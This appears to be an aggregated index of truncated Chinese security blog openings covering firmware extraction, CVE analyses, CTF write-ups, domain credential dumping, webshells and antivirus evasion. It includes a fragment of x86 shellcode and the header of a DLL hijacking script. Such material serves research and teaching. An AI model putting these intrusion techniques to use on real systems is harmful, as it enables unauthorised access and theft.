Source: Gorgias
通信模组概览 在车联网领域,TCU(Telematics control unit)是联网汽车不可缺少的一个单元(也叫T-Box,Telematics Box),TCU 的联网功能由通信模组实现(也称作 M2M 模块),通信模组使用的基带芯片几乎都支持全网
Source: Gorgias
Introduction to FlashROM 半年多没写文章了,固件提取系列已经写到第11部,这一个我觉得没那么难,可以公开. FlashROM是一款开源的Flash固件提取项目,支持多种硬件平台,SPI Flash和Parallel F
Source: Gorgias
前言 关于从加锁的硬盘提取信息的那些事,走了很多弯路. 以前买了NTG55的Head Unit,装配在奔驰E系车型. 将目标设备拆开后,可以发
Source: Gorgias
前言 本文记录了还原车机内NAND Flash文件系统的过程. 恢复过程 车机中高通CPU使用MXIC B162711 NAND Flash存储芯片,一般很少直接用NAND Flash的,除非像高通这样对自己的主控特别自信
Source: Gorgias
前言 固件目录如下,分为三个目录:APP、SOC、MCU. 也就是应用、核心板、底板. APP用于升级导航地图和语音识别库数据,MCU目录用于更新MCU固件,包括底板和仪表
Source: Gorgias
前言 Scheme 编程语言是一种Lisp方言,诞生于1975年,由 MIT 的 Gerald J. Sussman 和 Guy L. Steele Jr
Source: Gorgias
前言 SD卡(Secure Digital Memory Card)是一种存储介质,基于NAND闪存技术,作为MMC(Multimedia Card)的替代. 一般用于多媒体播放器,相机,手机,随后也大量用于IoT设备和汽车电子. 根据SD卡尺寸,可以分为SD
Source: Gorgias
Introduction 平时出差会用上4G网卡,这款4G路由器太好用了,支持LTE,UMTS,GSM,可以作为充电宝、路由器、上网卡,支持无线有线. 通过破解可以自定义IMEI,绕过ICCID与IMEI绑定限制,逃避网络审查. <img sr
Source: Gorgias
前言 最近吃饭的时候都在刷半次元,Cosplay区太多漂亮的小姐姐,可惜图片加了水印,并且有的图片不允许下载,不能方便随时欣赏,太煞心情了. 最近经常转发漂亮的小姐姐给朋友们,但是带了水印,被大家发现我沉迷半次元了. 很是困扰,打算绕过这些限制
Source: Gorgias
企业防御之安全运营数据分析
Source: 腾讯安全响应中心
谷歌称黑客滥用Gemini AI增强攻击能力,APT组织利用AI工具提高攻击效率,研究漏洞、编写脚本、侦察目标,威胁网络安全
Source: FreeBuf互联网安全新媒体平台
加州正全力应对野火带来的毁灭性打击,以保护民众的生命和财产安全. 然而不幸的是,这些灾难也为网络犯罪分子提供了可乘之机,他们利用灾时的混乱与不确定性实施犯罪. Veriti Research 发现,与当前山火灾难相关的网络钓鱼诈骗正呈现出一种令人担忧的趋势,这凸显出在这些脆弱时期,迫切需要提升公众的网络安全意识
Source: 嘶吼
前言 汽车行业非常严谨,许多产品都要按照规范设计,首先要搞清楚ISO与SAE的关系. 国
Source: Gorgias
数不清是第几场雪了. 漫天白云被揉碎成雪子,零落地撒
Source: 薇拉vera(左左薇拉)
当窗外升起第一朵新年烟花时,当躺平了一整个月的欧洲
Source: 薇拉vera(左左薇拉)
好久不见. 在汹涌而至的技术变革下,大家还好吗. 有受
Source: 薇拉vera(左左薇拉)
2021年的科幻出版物分析报告出炉啦,依然是从图书
Source: 薇拉vera(左左薇拉)
2021年终于结束了. 和往年相同,今年的我依然如飞
Source: 薇拉vera(左左薇拉)
焦糖工作室 donot Kanon Blog 勾陈安全实验室 chybeta 柯安的博客 niexinming cdxy 林一
Source: 薇拉vera(左左薇拉)
Hi. 👋 我是Vera,目前在欧洲某国攻读信息安全Ph
Source: 薇拉vera(左左薇拉)
Good good coding, day day writing. ( > ~ < )/ As a Researcher [1] “Do Anything Now”: Characterizing
Source: 薇拉vera(左左薇拉)
身边所有人听说我要带猫咪一起出国时都非常震惊. 说实
Source: 薇拉vera(左左薇拉)
和杨枫(HeavenDuke)老师合作写的一篇分析
Source: 薇拉vera(左左薇拉)
如题,工作一年的生活小结. 前三部分和第四部分可以视
Source: 薇拉vera(左左薇拉)
在安全领域,无论是工业界还是学术界,紧跟研(shi
Source: 薇拉vera(左左薇拉)
1-前言 代码克隆(Code clone),是指存在于
Source: 薇拉vera(左左薇拉)
本文是《AI与安全》系列文章的第7篇. 如今,机器学
Source: 薇拉vera(左左薇拉)
本文是《AI与安全》系列文章的第6篇. 在前文中,我
Source: 薇拉vera(左左薇拉)
前言 本文首发于安全客,转载请注明作者与出处. 本文是
Source: 薇拉vera(左左薇拉)
在提笔写今年的年终总结之前,我已经收到了好多催更提
Source: 薇拉vera(左左薇拉)
欢迎大家在评论区补充~ ——
Source: 薇拉vera(左左薇拉)
腾讯云上的学生优惠过期了,再加上各种让人不爽的小原
Source: 薇拉vera(左左薇拉)
前言 本文首发于安全客,转载请注明出处. 本文是《AI
Source: 薇拉vera(左左薇拉)
本文首发于安全客,转载请注明出处. 本文是《AI与安
Source: 薇拉vera(左左薇拉)
关于成电的季节里,我最喜欢的便是夏天. 那是我初入校
Source: 薇拉vera(左左薇拉)
【声明:《故事》摘要 系列为阅读 *罗伯特∙麦基 《故事
Source: 薇拉vera(左左薇拉)
最近重新捡起托福,突然想起了第一次考托时在考场被i
Source: 薇拉vera(左左薇拉)
大四上的学期总结,叫做“蜻蜓之眼”,也是中国当代艺
Source: 薇拉vera(左左薇拉)
在阿里实习期间做的一部分工作,和同事一起在HITB
Source: 薇拉vera(左左薇拉)
Misuse AI Misuse AI字如其意,即指黑客对AI技术的“误用”
Source: 薇拉vera(左左薇拉)
写在前面 随着AI军备战进入白热化状态,越来越多的行
Source: 薇拉vera(左左薇拉)
P. S. 鉴于个人水平有限,若有表述错误之处敬请指出,愿我
Source: 薇拉vera(左左薇拉)
上传附件失败 问题: 上传所有附件都显示上传失败. 解决
Source: 薇拉vera(左左薇拉)
异常是什么. 当我们提到异常检测(Anomaly De
Source: 薇拉vera(左左薇拉)
最近写SQL写得比较多,碰巧看到了Coding Ho
Source: 薇拉vera(左左薇拉)
给博客添加了新功能~ 如果复制文章大段文字,会在剪切
Source: 薇拉vera(左左薇拉)
“The world is not made of strings, but is made of things. ” ——辛
Source: 薇拉vera(左左薇拉)
想试着用一下评论系统,顺便加几个功能提高体验,但试
Source: 薇拉vera(左左薇拉)
这学期一开学,大家的话题基本就已经全是实习了,因为
Source: 薇拉vera(左左薇拉)
今年是书单汇总的第五年,看得书不多,玩的游戏看的番
Source: 薇拉vera(左左薇拉)
基本概念 入侵: 绕过系统安全机制的非授权行为. 危害计
Source: 薇拉vera(左左薇拉)
访问控制概述 访问控制是通过某种途径显式地准许或限制
Source: 薇拉vera(左左薇拉)
身份认证概述 定义: 身份认证是证实主体的真实身份与其
Source: 薇拉vera(左左薇拉)
隔离技术 对具有不同安全需求的应用系统进行分类保护,
Source: 薇拉vera(左左薇拉)
计算机网络 计算机网络的概念通常可以从不同角度来理解
Source: 薇拉vera(左左薇拉)
信息和信息安全 信息: 信息是对事物不确定性的度量,可
Source: 薇拉vera(左左薇拉)
概览 众所周知,分类问题是数据挖掘领域的主要任务之一
Source: 薇拉vera(左左薇拉)
说明 这篇文章主要是梳理聚类分析的基本算法以及步骤,
Source: 薇拉vera(左左薇拉)
定下预测目标 确定使用哪些数据来达到目标 梳理哪些特征
Source: 薇拉vera(左左薇拉)
想给网站套个免费的 Cloudflare CDN,如何让 Caddy 和 GitHub Pages 各自自动续期 SSL 证书
Source: Wins0n
不依赖任何第三方工具,不修改设置,让旧电脑绕过 Windows 11 的 TPM 和 CPU 检测限制,直接升级 Windows 11
Source: Wins0n
从 CVE-2024-33899 看垃圾英文小编污染简体中文互联网🤡
Source: Wins0n
本文整理了网上关于 PAN-OS 在野攻击漏洞 CVE-2024-3400 的各种技术细节信息,包括 Cookie 中的路径穿越漏洞和 Telemetry 中的命令注入漏洞的组合利用,以及攻击者 Post-Exploitation 相关的细节信息. 此外,Bishop Fox 发现了新的命令注入漏洞,因此带有漏洞的系统仅仅是禁用 Telemetry 服务是没有用的
Source: Wins0n
近期来自 Flatt Security Inc. 的 RyotaK 披露了 Windows 下多个编程语言的命令注入漏洞(漏洞被命名为 BatBadBut),其中 Rust 语言对应的漏洞编号为 CVE-2024-24576,因为 Rust 语言自带流量属性,国内安全/科技自媒体可能会使用一些怪异的标题来进行宣传. 实际上,这个漏洞跟内存安全没有关系,是 Windows 下 cmd
Source: Wins0n
CVE-2024-28085 Improper Neutralization of Escape Sequences in Wall
Source: Wins0n
CVE-2019-19726 OpenBSD dynamic loader Local Privilege Escalation Vulnerability
Source: Wins0n
CVE-2021-4034 PwnKit PolKit pkexec Local Privilege Escalation Vulnerability
Source: Wins0n
Empty Search Path (PATH or LD_LIBRARY_PATH) could lead to security vulnerabilities
Source: Wins0n
Citrix Bleed 漏洞(CVE-2023-4966)相关的几篇参考文档
Source: Wins0n
Living off the Land (LOTL) involves the abuse of native tools and processes on systems, especially living off the land binaries, often referred to as LOLBins, to blend in with normal system activities and operate discreetly with a lower likelihood of being detected or blocked because these tools are already deployed and trusted in the environment
Source: Wins0n
最近 ConnectWise ScreenConnect 爆了 2 个漏洞(CVE-2024-1709 和 CVE-2024-1708),其中 CVE-2024-1709 是一个 Authentication Bypass 漏洞,CVSS 评分 10 分. Sophos 安全团队表示,勤劳的攻击者已经在第一时间利用这些漏洞来投递勒索软件. 本文简单整理相关信息,作为漏洞案例研究系列的第一篇文章
Source: Wins0n
BlackHat Europe 2023 - LogoFAIL: Security Implications of Image Parsing During System Boot BlackHat USA 2009 - Attacking Intel® BIOS - PDF
Source: Wins0n
Old code dies hard: Finding new vulnerabilities in old third-party software components and the importance of having SBoM for IoT/OT devices
Source: Wins0n
未越狱 iOS 设备通过 Xcode 修改 GPS 定位信息
Source: Wins0n
为 Ubuntu 下通过 Snap 安装的 Docker 设置国内加速镜像(Registry Mirrors)
Source: Wins0n
参考 Phrack 文章 VM escape - QEMU Case Study [1] 对 QEMU 信息泄露漏洞 CVE-2015-5165 和堆溢出漏洞 CVE-2015-7504 进行调试分析并编写 Exploit 代码,本文主要分析其中的 RTL8139 网卡信息泄露漏洞 CVE-2015-5165
Source: Wins0n
Hyper-V Hypercall 相关基础知识介绍
Source: Wins0n
本文将详细介绍使用 AMD CPU 的电脑如何利用 VMware Workstation 搭建 Hyper-V 的调试环境
Source: Wins0n
周末花了点时间看了微软对 Hyper-V 的介绍文档《Hyper-V on Windows 10》,顺便记点笔记
Source: Wins0n
背景ChipSHOUTER是 Colin 在<a href="http://www. chipshouter. com/" target="_bla
Source: Yaseng
概述Tigard 是一款基于 FT2232H 芯片的多协议、多电压的开源硬件黑客工具. 通过结合常用的引脚、带标签的线束、板载电平转换和逻辑分析仪
Source: Yaseng
ZigBee简介ZigBee是一种无线通信网络标准,广泛用于IoT设备中,这些设备专为低数据传输率的低功耗使
Source: Yaseng
KillerBee框架<a href="https://github. com/riverl
Source: Yaseng
前言
Source: Yaseng
Defcon Group 8
Source: Yaseng
<a href="
Source: Yaseng
前言智能设备的加密安全篇 <a href="#某家存储网络硬盘的漏洞" class="head
Source: Yaseng
Ubertooth One 嗅探开启蓝牙锁</
Source: Yaseng
介绍<a href="https://greatscottgadgets. com/yardstickone/" target="_blank"
Source: Yaseng
前言“智能家居增长潜力巨大,对拉动新兴消费意义重大. ”“此次疫情催生了‘宅经济’,这其中,智能家居无接触式的交互方法,为疫情时代的人们带
Source: Yaseng
前言<img src="https://yaseng-1251294608. cos. ap-guangzhou
Source: Yaseng
前言“2020年4月30日起,丰巢快递柜开始实行超时收费的“会员制”,非会员包裹只可免费保存12小时,超过需收取0. 5元/12小
Source: Yaseng
前言<img src="https://yaseng-1251294608. cos. ap-guangzhou
Source: Yaseng
前言在线调试(OCD,On-Chip Debugging)接口可以提供对目标设备的芯片级控制,是工程师、研究人员、黑客用来提取程序固件代码或数据
Source: Yaseng
伪装之道《孙子兵法》“虚实篇”中提出“故形人而我无形,则我专而敌分”,即“示伪形于敌,而我之真形则藏而不露”,指出了“伪装”对促进战
Source: Yaseng
摘要随着云制造技术的兴起,加密域可逆水印技术逐渐受到了较多的关注. 然而,现有的大部分算法不仅只能应用于图像、视频等冗余性较大的载体,而且难以抵御
Source: Yaseng
前言上篇文章给 Burp Suite 添加验证码识别技能点,对于现代化的渗透测试神器来说,自动化切换 ip 也是必备技能,本文通过动态设置 HT
Source: Yaseng
前言Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,其各个组件之间可灵活配合,可定制化程度极高,正可谓居家旅行杀人越货
Source: Yaseng
域内日志一般以. evtx结尾,因此我们需要搜索域内日志可以使用dir指令dir/s/b *. evtx/s:表示递归搜索,包括子目录
Source: backlion
滥用活动目录ACLs\ACEs权限https://book. hacktricks. xyz/windows-hardening/active-directory-methodology/acl-persistence-abusehttps://www
Source: backlion
获取当前机器的明文密码在导出域hash之前,我们可以先尝试导出当前机器的本地的hash密码,如果域用户之前在这台机器上进行登陆操作的话,可以直接获取到域用户甚至域管理员的账号. 在Windows操作系统上,sam数据库(C:\Windows\System32\config\sam)里保存着本地用户的h
Source: backlion
在进行渗透过程中,Exchange邮件服务器通常是我们重点关注的对象,因为拿下了Exchange邮件服务器,凭借其机器账户的权限,我们可以赋予其他域内用户dcsync的权限,进而导出域内hash,拿下整个域. exchange系统的中配置powershell使用命令https://learn. micr
Source: backlion
在正常情况中,横向移动是在已经获取了足够的权限的情况下进行横向移动,下面中的方法大部分也需要高权限的操作. https://www. freebuf
Source: backlion
一、青龙组WEB web1 开局随便随便输入都可以登录,登上去以后生成了一个token和一个session,一个是jwt一个是flask框架的这边先伪造jwt,是国外的原题CTFtime. org / DownUnderCTF 2021 (线上) / JWT / Writeup先生成两个token,然
Source: backlion
decompress压缩包套娃,一直解到最后一层,将文件提取出来提示给出了一个正则,按照正则爆破密码,一共五位,第四位是数字 ^([a-z]){3}\d[a-z]$一共就五位数,直接ARCHPR爆破,得到密码 xtr4m,解压得到flagpleasingMusic题目描述中提到:一首歌可以好听到正反
Source: backlion
CryptoXOR1. 打开环境是一串字符,用一个异或脚本或者在线解码工具就可以解出来(只有一次加密)key是mimic解密得到flag在线解密或者脚本:# 密文ciphertext = "0b050c0e180e585f5c52555c5544545c0a0f44535f0f5e4456585958
Source: backlion
第一章 应急响应-webshell查杀 简介 靶机账号密码 root xjwebshell 1. 黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 2. 黑客使用的什么工具的shell github地址的md5 flag{md5} 3
Source: backlion
检材链接:https://pan. baidu. com/s/1fwHb_5svMyK3Gr4-QeNc0Q
Source: backlion
WEBSQLUP打开题目给了一个登录页面结合名字猜测为SQL注入查看源码发现有hint提示开发者使用的是模式匹配所以我尝试使用%来模糊匹配,登陆成功username=admin&password=%进入面板之后发现有一个文件上传功能尝试上传php文件,结果被waf,文件名字不能出现p我想到了使用. h
Source: backlion
一、WEB1. 消失的flag访问提示Access Deniedfakeip插件伪造ip提示File is Null尝试加file参数. file=index
Source: backlion
WEBEncirclingGame题目描述:A simple game, enjoy it and get the flag when you complete it. 开题,前端小游戏,红点出不去就行直接玩通关了看看如何不玩也能拿到flag,flag存储在后端php文件内,前端找不到. 看一下游戏的请
Source: backlion
CRYPTO签到题-学会SMhttps://www. json. cn/encrypt/sm3题目要求小写所以需要转换一下或者脚本:import hashlibmessage = "heidun2024"hash_object = hashlib
Source: backlion
第一部分:初始谜题这一部分算是开胃菜,形式也更像平时见到的CTF题目,三个题目都是python加密的,做出其中任意一个就可以进入第二部分,也就是一个更类似真实情境的大型密码渗透系统. 但每个初始谜题都是有分数的,所以就算开了第二部分也当然要接着做. 每个题目也都有前三血的加成,一血5%,二血3%,三血1
Source: backlion
0x00 前言本文是关于“2024高校网络安全管理运维赛”的详细题解,主要针对Web、Pwn、Re、Misc以及Algorithm等多方向题目的解题过程,包含但不限于钓鱼邮件识别、流量分析、SQLite文件解析、ssrf、xxe等等. 如有错误,欢迎指正. 0x01 Misc签到给了一个gif,直接在线
Source: backlion
WEB题目:Sanic's revenge解题步骤首先看到给出的附件:from sanic import Sanicimport osfrom sanic. response import text, htmlimport sysimport randomimport pydash# pydash==
Source: backlion
一、数据安全解题赛1、ds_0602解题思路题目让我们获取加密文件中的原始数据,解密后提交第六行第二列数据,下载附件,发现里面有两个文件,其中一个是“. enc”结尾,那这里我们得先简单了解一下“. enc”结尾的是什么类型的文件
Source: backlion
一、PWN1. Nullullullllu在直接给 libc_base 的情况下,一次任意地址写 \x00. 直接修改 IO_2_1_stdin 的 _IO_buf_base 末尾为 \x00 ,那么 _IO_buf_base 就会指向 IO_2_1_stdin 的 _IO_write_base,接下
Source: backlion
WEBPasswdStealer前言本来题目叫PasswdStealer的:)考点就是CVE-2024-21733在SpringBoot场景下的利用. 漏洞基本原理参考 https://mp. weixin
Source: backlion
Form1 private void button1_Click(object sender, EventArgs e) { Form f = new Form2(ref listView1); f. Activate(); f. Show(); } Form2
Source: 杀死比特
#coding=utf-8 # # Dll Hijacker # # platform: Python 2. x @ Windows # # author:Coca1ne import os,sys,time import pefile def main(): try: pe = pefile. PE(sys
Source: 杀死比特
以前刚开始学网络安全,是从免杀开始的. 记得那时候杀毒软件还很弱. 金山江民瑞星还存在
Source: 杀死比特
#include "stdafx. h" #include #include char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78
Source: 杀死比特
详细参数说明: 当把shellcode写入代码shellcode变量的时候,输入-bin shellcode. bin 将生成二进制文件数据流. 当需要把二进制数据流转换成hex(16进制的时候)输入-hex shellcode
Source: 杀死比特
http://www. cnblogs. com/killbit/p/5393301
Source: 杀死比特
前几天和哥们做一次渗透测试,内网情况、防护相当严格. 内网不允许访问DMZ,DMZ不允许访问内网,除了服务端口,比如80,3306. 经过长时间的分析,就发现本机连接了内网的一个MYQL,发现WEB开启了PHPMYADMIN,于是模拟发包拿到了一个shell
Source: 杀死比特
loader(exe): dll:Loaddll 添加一个. def模块定义文件
Source: 杀死比特
在渗透当中,经常会碰到这样的问题. 一个机器,机器上好几个用户,或者域内,想让某个机器的某个会话执行你想要执行的程序,或者中马,以当前会话来上线. 现在模拟如下的一个情况: 严格的DMZ,内网-->Dmz,而dmz->X<-内网
Source: 杀死比特
之前我在论坛发过了一句话的破解工具. 所以决定还是在基础上在改改,符合某些人的利用. 上一版只支持HTTPS/ASPX,这次改进后,也算是最后一版
Source: 杀死比特
真正做到PASS 360,启动项什么的. 我觉得还是有可能的把. 虽然它就是一个流氓,但是我们要想办法比它更流氓
Source: 杀死比特
在一些渗透当中,我们需要批量探针出口来达到我们的目的. 所以就有了这个丑陋简洁的小脚本. #
Source: 杀死比特
Shell是怎么拿下的我们就不纠结了. 我们来上传菜刀一句话,来仔细分析分析. 先来看看内网环境把
Source: 杀死比特
在学习界面设计,因为对一些控件不熟悉,所以也参考了别人的. 核心代码如下. void CTasklistDlg::Expand(){ m_list
Source: 杀死比特
最近想设计一款WEBSHELL的综合破解工具. 然后设计到了日志输出那儿,因为MFC不熟悉,刚学. 所以一直在想用edit控件好还是clist比较好
Source: 杀死比特
学习记录:两个类,一个为主类1个为:CCkDlg,主类1个为:Https,用来做HTTPS请求获得页面状态. 测试界面如下:CCkDlg 类里定义函数void CCkDlg::printf_r(CString str) //用于输出日志信息{ m_log. SetSel(-1,-1); m_log
Source: 杀死比特
个人在做Linux渗透测试往内网跨的时候,通常我碰到的Linux环境都会是如下集中情况1: DMZ,严格的DMZ,根本跨不到内网里去. 这种最恶心了. 2:WEB SERVER,严格区分,工作机和工作机放一块儿,WEB SERVR和SERVER放一块儿
Source: 杀死比特
#. /usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport urllibimport httplibclass Mythread(threading. Thread): def __init__(s
Source: 杀死比特
大家都知道,OPENSSH是基于Linux下,一款开源,安全性不错的Linux SSH会话连接工具. 在渗透当中,当我们get root了. 我们如何来记录Linux管理员登陆过的SSH
Source: 杀死比特
---恢复内容开始---#. /usr/bin/env python#-*- coding:utf-8 -*-import smtplibimport sysimport timeimport threadingclass Mythread(threading. Thread): def __in
Source: 杀死比特
10月份,Project AI 开源了 VulnHuntr 项目,这是一款由大模型驱动的 Python 静态代码安全分析工具,并成功发现了多个 AI 相关应用系统中的安全漏洞. 前段时间本地实测了一下,整体上说这是一个偏向于 Demo 性质的项目,但是主体功能已经比较完整. VulnHuntr 实现了多个步骤的代码分析,并且对于不同类型漏洞,设置了针对性的 Prompt
Source: KINGX
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞. 这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器. log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围
Source: KINGX
近年来各种大规模的红蓝对抗赛事方兴未艾,攻防实战受到了更多的重视. 红队和蓝队的打法逐渐提升并趋于成熟,已不再是单方面的攻击与防御,而演变为攻防博弈和几乎不限手法的对抗演习. 与传统的渗透测试相比,这种高强度的红蓝对抗有着明显不同,甚至较量的不仅仅是技法,而包括战术打法、心态与体力的考验
Source: KINGX
0x00 2019补完 一晃半年没更了,文章草稿倒是积累了一沓,没太多时间写. 然鹅前段时间竟然被在线催更,惭愧,于是决定赶在元旦前把一年以前的草稿给补完了,辞旧迎新. 都快2020年了,平时偶尔还是能遇到一些低版本的FastJson漏洞,现在遇到比较多的是部署在内网服务器上的场景
Source: KINGX
写在前面 Java JNDI注入有很多种不同的利用载荷,而这些Payload分别会面临一些限制. 笔者在实际测试过程中也遇到过很多有限制的情况,这里做个梳理并分享下如何绕过这些限制. 关于JNDI注入和RMI的基础知识,可以在我之前的文章《深入理解JNDI注入与Java反序列化漏洞利用》中获取
Source: KINGX
0. 前言 最近几年一直在做网络安全攻防相关的工作,从威胁情报、DDoS攻防、风控基础技术攻防、APT红蓝对抗等方向,基本覆盖了基础安全的几个主要场景,算是泛蓝军相关的内容,目标都是以攻击带动促进安全建设. 从实际项目来看,很多攻防的需求,前期都是因为现状不清晰、防护检测效果无法衡量、策略有缺漏、策略人员对防护场景认知不全面,或是对抗战场的升级,外部黑灰产的技术发展、真实对抗日趋激烈、需要拓展防守视野和能力,从而引进蓝军攻击团队进行场景的梳理、对现有安全体系的评估和对抗提升
Source: KINGX
1 - 概述 CobaltStrike是一款内网渗透的商业远控软件,支持自定义脚本扩展,功能非常强大. 前段时间Github上有好心人放出了CobaltStrike3. 12的试用版,接着Lz1y很快就放出了试用版补丁,加上热心老哥提供了的xor64
Source: KINGX
博弈论向我们揭示了要“发展信任”,人们所需要掌握的三件事: 1. 重复的互动 信任是保持人际关系长久的基石,但是信任能够建立的前提,是你要知道你们未来会有重复的互动. 2
Source: KINGX
0. 前言 在Java反序列化漏洞挖掘或利用的时候经常会遇到RMI、JNDI、JRMP这些概念,其中RMI是一个基于序列化的Java远程方法调用机制. 作为一个常见的反序列化入口,它和反序列化漏洞有着千丝万缕的联系
Source: KINGX
0. 前言 记录在FastJson反序列化RCE漏洞分析和利用时的一些细节问题. 1
Source: KINGX
漏洞概述 https://pivotal. io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式. 已经在被许多消息中间件与客户端工具所支持
Source: KINGX
CASB Cloud Access Security Broker RPA Robotic Process Automation Adversary Emulation 敌对模拟 OSINT Open Source Intelligence - 公开资源情报 DREAD 威胁建模 http://onlinehelp. microsoft. com/zh-cn/mdop/ff648644
Source: KINGX
1. 概述 在基于大数据的安全防御建设中,为了从数据挖掘出异常行为,通常我们需要计算不同个体之间的差异,从而通过相似性和类别来判定异常行为和正常行为,找出偏离用户行为基线的异常点. 数据科学中有很多常用的”距离“、”相似性“的计算方法
Source: KINGX
0. 概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm. com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险
Source: KINGX
0. 前言 WebAssembly/wasm 是一个由JavsScript进化来的,用于在浏览器内编写客户端脚本的底层的字节码格式. 最初目的是支持编译C和C++语言
Source: KINGX
0. 前言 使用DNS隧道,都需要先配置域名的DNS记录. 把指定域名的NS记录指向DNS隧道的服务器IP,需要添加两条记录: t1 IN NS t1ns
Source: KINGX
0x01 前言 RFC1035文档:https://tools. ietf. org/html/rfc1035 使用DNS作为RESTWeb服务的发现机制 https://www
Source: KINGX
0x00 关于Spark Hadoop通过解决了大数据的可靠存储和处理1. HDFS,在普通PC组成的集群上提供高可靠的文件存储. MapReduce,通过简单的Mapper和Reducer的抽象提供一个编程模型,并发处理数据
Source: KINGX
0x01 概述 Samba的is_known_pipename函数中,pipename路径符号存在漏洞,未过滤 / 符号. 攻击者连接上一个可写的共享目录,通过上传恶意的链接库文件,并构造一个指向该库文件的管道名,使服务端程序加载并执行它,从而实现远程代码执行. 0x02 影响 影响Samba 3
Source: KINGX
0x01 背景 Webshell一般是指以服务端动态脚本形式存在的一种网页后门. 在入侵检测的过程中,检测Webshell无疑是一大重点. 比较常见的检测手法有: 文件内容检测(静态检测) 文件行为检测(动态检测) 网络异常流量分析 …… 其中,静态检测是比较简单有效的检测Webshell的手段之一
Source: KINGX
回顾 优雅的构造JPLISAgent 获取JVMTIEnv指针 Windows平台 Linux平台 组装JPLISAgent 动态修改类 Windows平台 Linux平台 植入内存马 后记 参考 回顾 2018年,《利用“进程注入”实现无文件复活 WebShell》一文首次提出memShell(内
Source: rebeyond
前言 Java技术栈漏洞目前业已是web安全领域的主流战场,随着IPS、RASP等防御系统的更新迭代,Java攻防交战阵地已经从磁盘升级到了内存里面. 在今年7月份上海银针安全沙龙上,我分享了《Java内存攻击技术漫谈》的议题,个人觉得PPT承载的信息比较离散,技术类的内容还是更适合用文章的形式来分
Source: rebeyond
写在前面 近期冰蝎更新了内网穿透模块中的一些功能,有不少朋友不知道参数怎么填,希望能出一个使用指导手册,就借这个机会写一个“说明书”(文中有大量演示动图,请耐心等待加载). 基本信息 由于冰蝎采用了会话加密,所以客户端首次和服务端通信会有一个协商的过程(v3. 0之后的版本不存在密钥协商过程),成功建
Source: rebeyond
前言 近两年公司端侧发现的漏洞很大一部分都出在WebView白名单上,针对这类漏洞安全编码团队也组织过多次培训,但是这种漏洞还是屡见不鲜. 下面本人就结合产品中容易出现问题的地方,用实例的方式来总结一下如何正确使用WebView白名单,给开发的兄弟们作为参考. 在Android SDK中封装了一个可以
Source: rebeyond
概述 本系列文章重写了java、. net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具. 从而一劳永逸的绕过WAF或者其他网络防火墙的检测
Source: rebeyond
概述 本系列文章重写了java、. net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具. 从而一劳永逸的绕过WAF或者其他网络防火墙的检测
Source: rebeyond
概述 本系列文章重写了java、. net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具. 从而一劳永逸的绕过WAF或者其他网络防火墙的检测
Source: rebeyond
概述 本系列文章重写了java、. net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具. 从而一劳永逸的绕过WAF或者其他网络防火墙的检测
Source: rebeyond
引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网. 正好我之前一直有个通过“进程注入”来实现内存webshell的想法,于是就趁这个机会以Java为例
Source: rebeyond
Spring Data Redis隶属于Spring Data家族, 提供简单易用的方式来访问Redis缓存. Spring Data Redis在往Redis里面写数据的时候,默认会先对数据进行序列化,然后把序列化之后的字节码写入Redis;然后当Spring Data Redis从Redis里取
Source: rebeyond
*本文首发阿里云先知安全技术社区,原文链接https://xz. aliyun. com/t/2212 前言: 2018年3月中旬,Twitter 用户 @Vitaly Nikolenko 发布消息,称 ubuntu 最新版本(Ubuntu 16
Source: rebeyond
前言 2018年1月9号,腾讯玄武实验室召开了一个新闻发布会,向公众公布并演示了“应用克隆”漏洞,并称:利用该漏洞,用户只需要点击一个链接,用户的支付宝、携程等APP的登陆状态,就可以被克隆到其他用户的手机上,一时造成用户恐慌. 恰好这段时间支付宝的“天天领红包”活动进行的如火如荼,出现了通过点击一个
Source: rebeyond
朋友在执行的时候说有的会出现提权不成功,内核crash掉的现象. 因为cred结构体的偏移量可能因为内核版本不同、内核编译选项不同而出现差异,作者给的exp偏移量是写死的,所以exp里面对应的偏移地址也要改一下. 以下方法可以算出不同内核版本默认编译选项下的cred偏移地址: 1
Source: rebeyond
帮一个兄弟渗透的过程中在内网搜集到了不少oracle连接密码,oracle这么一款强大的数据库,找了一圈发现没有一个方便的工具可以直接通过用户名密码来提权的. 想起来自己之前写过一个oracle的连接工具,拿出来分享下. 工具没有用到什么新的技术,希望能给做渗透测试的兄弟们节省一点时间
Source: rebeyond
dirtycow官网上几个获得rootshell的exp大都会导致机器死机,在原作者的基础上改进了一下,做个记录:
Source: rebeyond
粗看了一下,发现这个漏洞还是比较鸡肋的. 如果前提条件满足,该漏洞可以在ssh server执行任意指令. 不过前提是:1
Source: rebeyond
elasticsearch原生支持date类型,json格式通过字符来表示date类型. 所以在用json提交日期至elasticsearch的时候,es会隐式转换,把es认为是date类型的字符串直接转为date类型. 至于什么样的字符串es会认为可以转换成date类型,参考elasticsearch
Source: rebeyond
提取日志信息的正则表达式
Source: rebeyond
